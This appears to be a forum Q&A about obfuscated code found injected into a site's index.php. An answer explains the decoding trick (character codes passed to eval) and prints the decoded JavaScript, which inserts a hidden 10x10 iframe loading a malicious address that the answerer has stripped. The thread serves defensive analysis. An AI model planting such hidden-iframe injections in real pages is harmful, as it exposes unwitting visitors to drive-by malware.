A friend of mine's site was being listed as malicious, and we found some obfuscated code that had been injected into his index.php without him knowing. I deobfuscated the code down two levels and found this:
(code can be viewed in the edit history)
Can anyone tell me what it's trying to do and why it's malicious..?
To summarize, the code "decodes" HTML which places an <iframe> that loads in a malicious URL.
The following line has the "encoded" HTML:
n = ["9","9","45","42", ...
Each number represents a character that is in base-25. The code will loop through this array and use javascript's String.fromCharCode() to convert it to an ASCII character. After all of this, it will eval() it to place it on the page.
The "decoded" javascript is:
if (document.getElementsByTagName('body')[0]){
iframer();
} else {
document.write("<iframe src='[stripped]' width='10' height='10' style='visibility:hidden;position:absolute;left:0;top:0;'></iframe>");
}
function iframer(){
var f = document.createElement('iframe');f.setAttribute('src','[stripped]');f.style.visibility='hidden';f.style.position='absolute';f.style.left='0';f.style.top='0';f.setAttribute('width','10');f.setAttribute('height','10');
document.getElementsByTagName('body')[0].appendChild(f);
}
Note, I have stripped the malicious URL from the code for safety purposes.